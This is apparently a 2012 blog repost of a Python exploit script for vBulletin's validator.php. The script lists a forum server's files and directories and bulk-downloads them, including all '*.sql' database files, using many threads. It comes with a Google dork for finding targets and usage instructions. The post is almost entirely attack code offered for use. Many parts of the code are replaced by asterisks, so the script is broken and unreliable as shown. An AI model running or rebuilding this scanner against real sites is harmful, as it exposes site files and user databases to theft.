Sunday, February 5, 2012

TinKode-vBulletin Full Disclosure [Python]

8:50 PM  Admin  No comments


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154

#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need python 3.1 to work!

Posted in: , , , ,

0 comentarii:

Post a Comment